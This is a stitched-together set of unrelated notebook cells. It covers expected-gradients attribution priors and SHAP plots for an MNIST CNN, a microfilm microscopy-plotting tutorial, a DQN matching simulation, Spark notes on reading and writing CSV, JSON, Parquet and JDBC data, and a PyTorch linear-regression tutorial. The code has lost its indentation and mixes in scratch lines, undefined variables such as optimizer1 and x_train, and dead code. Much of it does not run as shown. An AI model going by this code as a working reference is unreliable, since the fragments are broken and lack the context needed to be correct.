shap_values=explainer.shap_values(torch.Tensor(X).to(device), nsamples=200)
shap.summary_plot(shap_values, X)
explainer_temp = AttributionPriorExplainer(dataset, input_index=0, batch_size=5, k=200)
temp_dataloader=DataLoader(dataset=dataset, batch_size=5, shuffle=True, drop_last=True)
eg_list=[]
x_list=[]
for i, (x, y_true) in enumerate(temp_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
eg_temp=explainer_temp.attribution(model, x)
eg_list.append(eg_temp.detach().cpu().numpy())
x_list.append(x.detach().cpu().numpy())
eg_list_concat=np.concatenate(eg_list)
x_list_concat=np.concatenate(x_list)
shap.summary_plot(eg_list_concat, x_list_concat)
batch_size=50
num_epochs=60
valid_size=5000
train_dataset=torchvision.datasets.MNIST('./data', train=True, download=True, transform=transforms.Compose([transforms.RandomRotation([-15,15], fill = (0,)),
transforms.RandomAffine(degrees=0, translate=(4/28,4/28), fillcolor=0),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
train_dataset=Subset(train_dataset,range(valid_size,len(train_dataset)))
valid_dataset=torchvision.datasets.MNIST('./data', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
valid_dataset=Subset(valid_dataset,range(valid_size))
test_dataset=torchvision.datasets.MNIST('./data', train=False, download=True, transform=transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
train_dataloader=DataLoader(train_dataset, shuffle=True, drop_last=True, batch_size=batch_size)
valid_dataloader=DataLoader(valid_dataset, shuffle=False, drop_last=True, batch_size=batch_size)
test_dataloader=DataLoader(test_dataset, shuffle=False, drop_last=True, batch_size=batch_size)
class MNISTModel(torch.nn.Module):
def __init__(self):
super(MNISTModel,self).__init__()
layer1_conv=torch.nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, padding=int((5-1)/2));torch.nn.init.xavier_uniform_(layer1_conv.weight);torch.nn.init.zeros_(layer1_conv.bias);
layer1_batchnorm=torch.nn.BatchNorm2d(num_features=32, momentum=0.1)
layer1_activation=torch.nn.ReLU()
layer1_maxpool=torch.nn.MaxPool2d(kernel_size=2, padding=0)
layer2_conv=torch.nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, padding=int((5-1)/2));torch.nn.init.xavier_uniform_(layer2_conv.weight);torch.nn.init.zeros_(layer2_conv.bias);
layer2_batchnorm=torch.nn.BatchNorm2d(num_features=64, momentum=0.1)
layer2_activation=torch.nn.ReLU()
layer2_maxpool=torch.nn.MaxPool2d(kernel_size=2, padding=0)
layer3_flatten=torch.nn.Flatten()
layer3_fc=torch.nn.Linear(3136,1024);torch.nn.init.xavier_uniform_(layer3_fc.weight);torch.nn.init.zeros_(layer3_fc.bias);
layer3_activation=torch.nn.ReLU()
layer3_dropout=torch.nn.Dropout(p=0.5)
layer4_fc=torch.nn.Linear(1024, 10)
self.layers=torch.nn.Sequential(layer1_conv, layer1_batchnorm, layer1_activation, layer1_maxpool,
layer2_conv, layer2_batchnorm, layer2_activation, layer2_maxpool,
layer3_flatten, layer3_fc, layer3_activation, layer3_dropout,
layer4_fc)
#print(dir(self.layers))
#print(self.layers._get_name())
def forward(self,x):
x=self.layers(x)
return x
device=torch.device('cuda')
model=MNISTModel().to(device)
len(train_dataset)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer, gamma=0.95)
#scheduler1 = torch.optim.lr_scheduler.StepLR(optimizer1, step_size=5, gamma=0.5)
"""
global_step=0
"""
lamb=0.5
explainer=AttributionPriorExplainer(reference_dataset=train_dataset, input_index=0, batch_size=batch_size, k=5)
loss_func=torch.nn.CrossEntropyLoss()
for epoch in range(60):
for i, (images, labels_true) in enumerate(train_dataloader):
images, labels_true = images.to(device), labels_true.to(device)
optimizer.zero_grad()
labels_onehot_pred=model(images)
labels_onehot_true=torch.nn.functional.one_hot(labels_true, num_classes=10)
eg=explainer.attribution(model, images, valid_output=labels_onehot_true)
eg_standardized=(eg-eg.mean(dim=(-1,-2,-3), keepdim=True))/\
(eg.std(dim=(-1,-2,-3),keepdim=True).clamp(max=1/np.sqrt(torch.numel(eg[0]))))
loss=loss_func(labels_onehot_pred, labels_true)
loss.backward(retain_graph=True)
optimizer.step()
"""
global_step+=1
if (global_step*50)%60000==0:
pass
"""
scheduler.step()
break
images.shape, labels_true.shape
eg_standardized=(eg-eg.mean(dim=(-1,-2,-3), keepdim=True))/\
(eg.std(dim=(-1,-2,-3),keepdim=True).clamp(max=1/np.sqrt(torch.numel(eg[0]))))
images.shape
torch.nn.functional.one_hot??
eg_standardized[0].std()
eg[0].mean()
eg[0].std()
np.sqrt()
"""
https://github.com/suinleelab/attributionpriors/blob/master/attributionpriors/pytorch_ops.py
https://github.com/slundberg/shap/blob/master/shap/explainers/_gradient.py
Currently, in the case of one-hot encoded class output, ignore attribution for output indices that are not true.
"""
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader
class AttributionPriorExplainer():
def __init__(self, reference_dataset, input_index, batch_size, k):
self.reference_dataloader=DataLoader(dataset=reference_dataset,
batch_size=batch_size*k,
shuffle=True,
drop_last=True)
self.reference_dataloader_iterator=iter(self.reference_dataloader)
self.batch_size=batch_size
self.k=k
self.input_index=input_index
def get_reference_data(self):
try:
reference_data=next(self.reference_dataloader_iterator)
except:
self.reference_dataloader_iterator=iter(self.reference_dataloader)
reference_data=next(self.reference_dataloader_iterator)
if self.input_index is None:
return reference_data
else:
return reference_data[self.input_index]
def interpolate_input_reference(self, input_data, reference_data):
alpha=torch.empty(self.batch_size, self.k).uniform_(0,1).to(input_data.device)
alpha=alpha.view(*([self.batch_size, self.k,]+[1]*len(input_data.shape[1:])))
input_reference_interpolated=(1-alpha)*reference_data+(alpha)*input_data.unsqueeze(1)
return input_reference_interpolated
def diff_input_reference(self, input_data, reference_data):
return input_data.unsqueeze(1)-reference_data
def get_grad(self, model, input_reference_interpolated, valid_output):
input_reference_interpolated.requires_grad=True
input_reference_interpolated_grad=torch.zeros(input_reference_interpolated.shape).float().to(input_reference_interpolated.device)
for i in range(self.k):
batch_input=input_reference_interpolated[:,i,]
batch_output=model(batch_input)
if valid_output is None:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
else:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=valid_output,
create_graph=True)[0]
input_reference_interpolated_grad[:,i,]=grad_out
return input_reference_interpolated_grad
def attribution(self, model, input_data, valid_output=None):
model_dtype=next(model.parameters()).dtype
reference_data=self.get_reference_data().to(model_dtype).to(input_data.device)
assert input_data.dtype==model_dtype
assert input_data.shape[0]==self.batch_size
assert input_data.shape[1:]==reference_data.shape[1:]
assert input_data.device==next(model.parameters()).device
reference_data=reference_data.view(self.batch_size, self.k, *reference_data.shape[1:])
input_reference_interpolated=self.interpolate_input_reference(input_data, reference_data)
input_reference_diff=self.diff_input_reference(input_data, reference_data)
input_reference_interpolated_grad=self.get_grad(model, input_reference_interpolated, valid_output)
diff_interpolated_grad=input_reference_diff*input_reference_interpolated_grad
expected_grad=diff_interpolated_grad.mean(axis=1)
return expected_grad
"""
if list(batch_output.shape[1:])==[1]:
# scalar output
else:
# vector output
if grad_output is None:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
else:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=grad_outputs.to(input_reference_interpolated.device),
create_graph=True)[0]
def gather_nd(self,params, indices):
max_value = functools.reduce(operator.mul, list(params.size())) - 1
indices = indices.t().long()
ndim = indices.size(0)
idx = torch.zeros_like(indices[0]).long()
m = 1
for i in range(ndim)[::-1]:
idx += indices[i]*m
m *= params.size(i)
idx[idx < 0] = 0
idx[idx > max_value] = 0
return torch.take(params, idx)
sample_indices=torch.arange(0,batch_output.size(0)).to(input_reference_interpolated.device)
indices_tensor=torch.cat([sample_indices.unsqueeze(1),
sparse_output.unsqueeze(1).to(input_reference_interpolated.device)],dim=1)
batch_output=self.gather_nd(batch_output, indices_tensor)
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
print('a',torch.ones_like(batch_output).to(input_reference_interpolated.device).shape)
print('equal',np.all((grad_out==grad_out2).cpu().numpy()))
"""
optimizer1.param_groups[0]['amsgrad']
optimizer2 = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler2 = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer2, gamma=0.95)
#scheduler1 = torch.optim.lr_scheduler.StepLR(optimizer1, step_size=5, gamma=0.5)
optimizer2.param_groups[0]['params'][-1]
len(optimizer1.param_groups)
scheduler1.get_last_lr()
scheduler1.step()
optimizer1.param_groups[0]['initial_lr']
optimizer1.param_groups[0]['lr']
test_dataset
device=torch.device('cuda')
convergence_list1_list_eg=[]
convergence_list2_list_eg=[]
convergence_list3_list_eg=[]
for k in [1,2,3,4,5]:
print('k =',k)
model=MLP().to(device)
with torch.no_grad():
model.layers[0].weight[0,0]=10
model.layers[0].weight[0,1]=10
model.layers[0].bias[0]=-6
x_zeros = torch.ones_like(x_train[:,:])
background_dataset = BinaryData(x_zeros)
explainer = AttributionPriorExplainer(background_dataset, 64, k=k)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)
bce_term = torch.nn.BCELoss()
train_loss_list_mean_list=[]
convergence_list1=[]
convergence_list2=[]
convergence_list3=[]
for epoch in range(200):
train_loss_list=[]
for i, (x, y_true) in enumerate(train_loader):
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
eg_abs_mean=eg.abs().mean(0)
loss=bce_term(y_pred, y_true.unsqueeze(1)) + eg_abs_mean[1]
loss.backward(retain_graph=True)
optimizer.step()
train_loss_list.append(loss.item())
train_loss_list_mean=np.mean(train_loss_list)
train_loss_list_mean_list.append(train_loss_list_mean)
convergence_list1.append(calculate_dependence(model)[0])
convergence_list2.append(calculate_dependence(model)[1])
convergence_list3.append(calculate_dependence(model)[2])
convergence_list1_list_eg.append(convergence_list1)
convergence_list2_list_eg.append(convergence_list2)
convergence_list3_list_eg.append(convergence_list3)
model(img),model(img).shape
model(img).shape
img.shape
train_dataloader=DataLoader(dataset=train_dataset, batch_size=10)
for img,label in train_dataloader:
print(img)
break
torch.nn.MaxPool2d(kernel_size=2, padding='valid')
torch.nn.MaxPool2d(kernel_size=2)
train_dataloader=DataLoader(dataset=train_dataset, batch_size=10)
loss_func=torch.nn.CrossEntropyLoss()
for images, labels_true in train_dataloader:
images=images
labels_pred=model.forward(images)
print(labels_pred.shape)
loss_func(labels_pred, labels_true)
import tensorflow as tf
image = tf.constant(np.arange(1, 24+1, dtype=np.int32), shape=[2,2, 2, 3])
new_image = tf.image.per_image_standardization(image)
np.var(new_image[0])
new_image
np.var(new_image)
torch.nn.Dropout?
import torch
torch.nn.Conv2d??
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.dropout1 = nn.Dropout(0.25)
self.dropout2 = nn.Dropout(0.5)
self.fc1 = nn.Linear(9216, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = F.max_pool2d(x, 2)
x = self.dropout1(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
output = F.log_softmax(x, dim=1)
return output
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
if args.dry_run:
break
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset1 = datasets.MNIST('../data', train=True, download=True,
transform=transform)
dataset2 = datasets.MNIST('../data', train=False,
transform=transform)
model = Net()
train_loader = torch.utils.data.DataLoader(dataset1,batch_size=64)
test_loader = torch.utils.data.DataLoader(dataset2, batch_size=1000)
device=torch.device('cuda')
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
break
data.shape
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=14, metavar='N',
help='number of epochs to train (default: 14)')
parser.add_argument('--lr', type=float, default=1.0, metavar='LR',
help='learning rate (default: 1.0)')
parser.add_argument('--gamma', type=float, default=0.7, metavar='M',
help='Learning rate step gamma (default: 0.7)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--dry-run', action='store_true', default=False,
help='quickly check a single pass')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save-model', action='store_true', default=False,
help='For Saving the current Model')
args = parser.parse_args()
use_cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
device = torch.device("cuda" if use_cuda else "cpu")
train_kwargs = {'batch_size': args.batch_size}
test_kwargs = {'batch_size': args.test_batch_size}
if use_cuda:
cuda_kwargs = {'num_workers': 1,
'pin_memory': True,
'shuffle': True}
train_kwargs.update(cuda_kwargs)
test_kwargs.update(cuda_kwargs)
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset1 = datasets.MNIST('../data', train=True, download=True,
transform=transform)
dataset2 = datasets.MNIST('../data', train=False,
transform=transform)
train_loader = torch.utils.data.DataLoader(dataset1,**train_kwargs)
test_loader = torch.utils.data.DataLoader(dataset2, **test_kwargs)
model = Net().to(device)
optimizer = optim.Adadelta(model.parameters(), lr=args.lr)
scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
for epoch in range(1, args.epochs + 1):
train(args, model, device, train_loader, optimizer, epoch)
test(model, device, test_loader)
scheduler.step()
if args.save_model:
torch.save(model.state_dict(), "mnist_cnn.pt")
"""
https://github.com/suinleelab/attributionpriors/blob/master/attributionpriors/pytorch_ops.py
https://github.com/slundberg/shap/blob/master/shap/explainers/_gradient.py
"""
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader
class AttributionPriorExplainer():
def __init__(self, reference_dataset, batch_size, k):
self.reference_dataloader=DataLoader(dataset=reference_dataset,
batch_size=batch_size*k,
shuffle=True,
drop_last=True)
self.reference_dataloader_iterator=iter(self.reference_dataloader)
self.batch_size=batch_size
self.k=k
def get_reference_data(self):
try:
reference_data=next(self.reference_dataloader_iterator)
except:
self.reference_dataloader_iterator=iter(self.reference_dataloader)
reference_data=next(self.reference_dataloader_iterator)
return reference_data
def interpolate_input_reference(self, input_data, reference_data):
alpha=torch.empty(self.batch_size, self.k).uniform_(0,1).to(input_data.device)
alpha=alpha.view(*([self.batch_size, self.k,]+[1]*len(input_data.shape[1:])))
input_reference_interpolated=(1-alpha)*reference_data+(alpha)*input_data.unsqueeze(1)
return input_reference_interpolated
def diff_input_reference(self, input_data, reference_data):
return input_data.unsqueeze(1)-reference_data
def get_grad(self, model, input_reference_interpolated):
input_reference_interpolated.requires_grad=True
input_reference_interpolated_grad=torch.zeros(input_reference_interpolated.shape).float().to(input_reference_interpolated.device)
for i in range(self.k):
batch_input=input_reference_interpolated[:,i,]
batch_output=model(batch_input)
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
input_reference_interpolated_grad[:,i,]=grad_out
return input_reference_interpolated_grad
def attribution(self, model, input_data):
model_dtype=next(model.parameters()).dtype
reference_data=self.get_reference_data().to(model_dtype).to(input_data.device)
assert input_data.dtype==model_dtype
assert input_data.shape[0]==self.batch_size
assert input_data.shape[1:]==reference_data.shape[1:]
assert input_data.device==next(model.parameters()).device
reference_data=reference_data.view(self.batch_size, self.k, *reference_data.shape[1:])
input_reference_interpolated=self.interpolate_input_reference(input_data, reference_data)
input_reference_diff=self.diff_input_reference(input_data, reference_data)
input_reference_interpolated_grad=self.get_grad(model, input_reference_interpolated)
diff_interpolated_grad=input_reference_diff*input_reference_interpolated_grad
expected_grad=diff_interpolated_grad.mean(axis=1)
return expected_grad
```
# Create your first plots
Imagine that you have acquired some microscopy data. First you import them as NumPy arrays. We do that here using scikit-image and an online dataset, but you are free to import your data however you want:
```
import skimage.io
image = skimage.io.imread('https://github.com/guiwitz/microfilm/raw/master/demodata/coli_nucl_ori_ter.tif')
image.shape
```
We have an image with 3 channels and 30 time points. To create a simple plot, we only take the first time point:
```
image_t0 = image[:,0,:,:]
```
Now we can import the microfilm package. For simple plots, we only need the ```microshow``` function of the ```microfilm.microplot``` submodule:
```
from microfilm.microplot import microshow
```
Plotting a color composite image of our numpy array is now as easy as using:
```
microshow(image_t0);
```
With a few more options, we can change the colormaps and add information to the figure:
```
microshow(image_t0, cmaps=['Greys','pure_cyan','pure_magenta'], flip_map=False,
label_text='A', label_color='black', channel_label_show=True, channel_names=['TFP','CFP','mCherry'],
unit='um', scalebar_unit_per_pix=0.06, scalebar_size_in_units=3, scalebar_color='black', scalebar_font_size=0.05);
```
In addition to single plots, you can also create panels and animations. For that, we first import additional parts of the package. The panel object:
```
from microfilm.microplot import Micropanel
```
And the animation module:
```
from microfilm.microanim import Microanim
```
Let's first look at panels. Imagine that you want to display two of the channels separately in a figure. You start by creating each element of your figure and adjusting it as you want:
```
from microfilm.microplot import Microimage
microim1 = microshow(image_t0[1], cmaps='pure_cyan', label_text='A', channel_names='CFP')
microim2 = microshow(image_t0[2], cmaps='pure_magenta', label_text='B', channel_names='mCherry')
```
And now you create your panel, specifying the grid that you want and using the ```add_element``` method to add each of your figures to the panel object:
```
panel = Micropanel(rows=1, cols=2, figscaling=3)
panel.add_element([0,0], microim1);
panel.add_element([0,1], microim2);
panel.add_channel_label()
```
```microfilm``` takes care of setting the figure to the right size, avoiding blank space, adjusting the labels, etc.
Finally, with almost the same commands, you can create an animation object. Now you have to provide the complete array and not just a single time point. In a Jupyter notebook, you can create an interactive figure, but here we just create the animation, save it and reload it.
We create the animation in three steps:
- first we create an animation object with the same options as used for a regular figure (we use only two channels here)
- second we add a time-stamp with the specific ```add_time_stamp``` method
- third we save the animation as a movie file
```
anim = Microanim(
image[[1,2],:, :,:], cmaps=['pure_cyan','pure_magenta'], flip_map=False, fig_scaling=5,
label_text='A', unit='um', scalebar_unit_per_pix=0.065, scalebar_size_in_units=3, scalebar_font_size=0.05)
anim.add_time_stamp(unit='MM', unit_per_frame=3, location='upper right')
anim.save_movie('first_anim.mp4', quality=9)
from IPython.display import Video
Video('https://github.com/guiwitz/microfilm/raw/master/docs/first_anim.mp4')
```
## Next steps
You can find more details on how to create these plots and the functions of the module in [this more in-depth guide](../notebooks/create_plots.ipynb).
You can also discover how to go beyond single plots:
- [if you have time-lapse data you can animate such plots and export them as movies](../notebooks/create_animations.ipynb)
- [you can combine multiple plots into a figure with several panels](../notebooks/create_panels.ipynb)
```
import numpy as np
import tensorflow as tf
from numpy.random import rand, randint
from src.environment.matching import simple_matching
from src.agent.dqn.dqn import exp_replay
from src.agent.dqn.models import MLP
def action2matching(n, action):
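    # map a flat action index (0..n*n-1) onto an n x n 0/1 matching matrix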
m = np.zeros((n,n))
m[int(action/n), action%n] = 1
return m
def run_sim(env, agent, steps = 100, disable_training = False):
last_observation = None
last_action = None
for s in range(steps):
new_observation = env.observe()
reward = env.collect_reward()
# store last transition
if last_observation is not None:
agent.store(last_observation, last_action, reward, new_observation)
# act
new_action = agent.action(new_observation)
        env.perform_action(action2matching(len(env.types), new_action))
#train
if not disable_training:
agent.training_step()
# update current state as last state.
last_action = new_action
last_observation = new_observation
types = np.array([1,2,3])
weight_matrix = np.array([[0,1,2],[-1,0,0],[-1,-1,0]])
#make the weights under diagonal negative enforces that matches are counted only once
arrival_probabilities = np.array([0.2,0.5,0.2])
departure_probabilities = np.array([0.002,0.002,0.006])
g = simple_matching(types, weight_matrix, arrival_probabilities, departure_probabilities)
g.num_actions
g.observation_shape
tf.reset_default_graph()
session = tf.InteractiveSession()
# Brain maps from observation to Q values for different actions.
# Here it is done using a multi-layer perceptron with 2 hidden
# layers
brain = MLP(list(g.observation_shape), [200, 200, g.num_actions], # change size to larger observation arrays
[tf.tanh, tf.tanh, tf.identity])
# The optimizer to use. Here we use RMSProp as recommended
# by the publication
optimizer = tf.train.RMSPropOptimizer(learning_rate= 0.001, decay=0.9)
# DiscreteDeepQ object
current_controller = exp_replay(g.observation_shape, g.num_actions, brain, optimizer, session,
discount_rate=0.99, exploration_period=5000, max_experience=10000,
store_every_nth=4, train_every_nth=4)
session.run(tf.initialize_all_variables())
session.run(current_controller.target_network_update)
obs = g.observe()
current_controller.action(obs)
a = np.zeros((2,3))
a[np.newaxis,:]
run_sim(g, current_controller, 10000)
g.state
g.total_reward
```
# Chapter 9
## Reading and Writing data in Spark
### Reading
```python
(spark.read.format("csv")
    .option("mode", "FAILFAST")
    .option("inferSchema", "true")
    .option("path", "path/to/file(s)")
    .schema(someSchema)
    .load())
```
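`someSchema` above is a `StructType` that you define yourself; a possible sketch for the flight-data files used in the examples below (the column names are assumptions based on the 2010 flight summary data):

```python
from pyspark.sql.types import StructType, StructField, StringType, LongType

# Hypothetical explicit schema matching the flight summary files
someSchema = StructType([
    StructField("DEST_COUNTRY_NAME", StringType(), True),
    StructField("ORIGIN_COUNTRY_NAME", StringType(), True),
    StructField("count", LongType(), True)
])
```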
### Writing
```python
(dataframe.write.format("csv")
    .option("mode", "OVERWRITE")
    .option("dateFormat", "yyyy-MM-dd")
    .option("path", "path/to/file(s)")
    .save())
```
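The `mode` option controls what happens when data already exists at the target location; the standard Spark save modes are summarized in this sketch (reusing the same placeholder `dataframe` as above):

```python
# append        : add the new rows to the data already at the target
# overwrite     : replace the existing data completely
# errorIfExists : fail the write if the target already exists (the default)
# ignore        : silently skip the write if the target already exists
dataframe.write.format("csv").mode("overwrite").save("path/to/file(s)")
```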
```
import os
os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.postgresql:postgresql:42.1.1 pyspark-shell'
```
### Example for reading and writing `CSVs`
```
# Reading data from Google Cloud Storage
csvFile = spark.read.format("csv")\
.option("header", "true")\
.option("mode", "FAILFAST")\
.option("inferSchema", "true")\
.load("gs://reddys-data-for-experimenting/flight-data/csv/2010-summary.csv")
csvFile.printSchema()
# Writing data back to Google Cloud Storage
csvFile.write.format("csv") \
.mode("overwrite") \
.option("sep", "\t") \
.save("gs://reddys-data-for-experimenting/output/chapter9/tsv")
```
### Example for reading and writing `JSON`
```
# Reading data from Google Cloud Storage
jsonData = spark.read.format("json").option("mode", "FAILFAST")\
.option("inferSchema", "true")\
.load("gs://reddys-data-for-experimenting/flight-data/json/2010-summary.json")
jsonData.printSchema()
jsonData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/json")
```
### Example for reading and writing `Parquet`
```
parquetData = spark.read.format("parquet")\
.load("gs://reddys-data-for-experimenting/flight-data/parquet/2010-summary.parquet")
parquetData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/parquet")
```
### Example for reading and writing `ORC`
```
orcData = spark.read.format("orc").load("gs://reddys-data-for-experimenting/flight-data/orc/2010-summary.orc")
orcData.write.format("json").mode("overwrite").save("gs://reddys-data-for-experimenting/output/chapter9/orc")
```
### Example for Reading and writing with `JDBC`
Code snippet
``` python
driver = "org.sqlite.JDBC"
path = "gs://reddys-data-for-experimenting//flight-data/jdbc/my-sqlite.db"
url = "jdbc:sqlite:" + path
tablename = "flight_info"
dbDataFrame = spark.read.format("jdbc").option("url", url)\
.option("dbtable", tablename).option("driver", driver).load()
pgDF = spark.read.format("jdbc")\
.option("driver", "org.postgresql.Driver")\
.option("url", "jdbc:postgresql://database_server")\
.option("dbtable", "schema.tablename")\
.option("user", "username").option("password", "my-secret-password").load()
```
Spark also performs query pushdown, so that it fetches as little data as possible from the underlying data source.
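For example (a sketch reusing the `dbDataFrame` defined in the snippet above), a filter on a JDBC-backed DataFrame is pushed to the database, which you can verify in the physical plan:

```python
# The predicate shows up under "PushedFilters" in the plan instead of being applied in Spark
dbDataFrame.filter("DEST_COUNTRY_NAME in ('Anguilla', 'Sweden')").explain()
```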
You can also write to SQL databases using Spark:
```python
csvFile.write.jdbc(newPath, tablename, mode="overwrite", properties=props)
```
### Writing data into partitions
```
csvFile.repartition(5).write.format("csv") \
.save("gs://reddys-data-for-experimenting/output/chapter9/partitioned-csv")
csvFile.write.mode("overwrite").partitionBy("DEST_COUNTRY_NAME")\
.save("gs://reddys-data-for-experimenting/output/chapter9/partitioned-by-key-parquet")
```
### Writing data into buckets
Bucketing is only supported in `Scala` and not in `Python` at the moment
```scala
val numberBuckets = 10
val columnToBucketBy = "count"
// Note: bucketBy must be combined with saveAsTable (the table name below is arbitrary);
// a plain save() does not support bucketed writes
csvFile.write.format("parquet")
  .mode("overwrite")
  .bucketBy(numberBuckets, columnToBucketBy)
  .option("path", "gs://reddys-data-for-experimenting/output/chapter9/partitioned-csv")
  .saveAsTable("bucketed_flights")
```
```
import torch
import numpy as np
# Input (temp, rainfall, humidity)
inputs = np.array([[73, 67, 43],
[91, 88, 64],
[87, 134, 58],
[102, 43, 37],
[69, 96, 70]], dtype='float32')
# Targets (apples, oranges)
targets = np.array([[56, 70],
[81, 101],
[119, 133],
[22, 37],
[103, 119]], dtype='float32')
# Convert inputs and targets to tensors
inputs = torch.from_numpy(inputs)
targets = torch.from_numpy(targets)
print(inputs)
print(targets)
# Weights and biases
w = torch.randn(2, 3, requires_grad=True)
b = torch.randn(2, requires_grad=True)
print(w)
print(b)
def model(x):
return x @ w.t() + b
# Generate predictions
preds = model(inputs)
print(preds)
# Compare with targets
print(targets)
# MSE loss
def mse(t1, t2):
diff = t1 - t2
return torch.sum(diff * diff) / diff.numel()
# Train for 500 epochs
for i in range(500):
preds = model(inputs)
loss = mse(preds, targets)
loss.backward()
with torch.no_grad():
w -= w.grad * 1e-5
b -= b.grad * 1e-5
w.grad.zero_()
b.grad.zero_()
# Calculate loss
preds = model(inputs)
loss = mse(preds, targets)
print(loss)
# Predictions
preds
# Targets
targets
```
## Using Builtins
```
import torch.nn as nn
import torch
import numpy as np
# Input (temp, rainfall, humidity)
inputs = np.array([[73, 67, 43],
[91, 88, 64],
[87, 134, 58],
[102, 43, 37],
[69, 96, 70],
[74, 66, 43],
[91, 87, 65],
[88, 134, 59],
[101, 44, 37],
[68, 96, 71],
[73, 66, 44],
[92, 87, 64],
[87, 135, 57],
[103, 43, 36],
[68, 97, 70]],
dtype='float32')
# Targets (apples, oranges)
targets = np.array([[56, 70],
[81, 101],
[119, 133],
[22, 37],
[103, 119],
[57, 69],
[80, 102],
[118, 132],
[21, 38],
[104, 118],
[57, 69],
[82, 100],
[118, 134],
[20, 38],
[102, 120]],
dtype='float32')
inputs = torch.from_numpy(inputs)
targets = torch.from_numpy(targets)
inputs
from torch.utils.data import TensorDataset
# Define dataset
train_ds = TensorDataset(inputs, targets)
train_ds[0:3]
from torch.utils.data import DataLoader
# Define data loader
batch_size = 5
train_dl = DataLoader(train_ds, batch_size, shuffle=True)
for xb, yb in train_dl:
print(xb)
print(yb)
break
# Define model
model = nn.Linear(3, 2)
print(model.weight)
print(model.bias)
# Parameters
list(model.parameters())
# Generate predictions
preds = model(inputs)
preds
# Import nn.functional
import torch.nn.functional as F
# Define loss function
loss_fn = F.mse_loss
loss = loss_fn(model(inputs), targets)
print(loss)
# Define optimizer
opt = torch.optim.SGD(model.parameters(), lr=1e-5)
from tqdm import tqdm
# Utility function to train the model
def fit(num_epochs, model, loss_fn, opt, train_dl):
# Repeat for given number of epochs
for epoch in tqdm(range(num_epochs)):
# Train with batches of data
for xb,yb in train_dl:
# 1. Generate predictions
pred = model(xb)
# 2. Calculate loss
loss = loss_fn(pred, yb)
# 3. Compute gradients
loss.backward()
# 4. Update parameters using gradients
opt.step()
# 5. Reset the gradients to zero
opt.zero_grad()
# Print the progress
if (epoch+1) % 10 == 0:
print(' | Epoch [{}/{}], Loss: {:.4f}'.format(epoch+1, num_epochs, loss.item()))
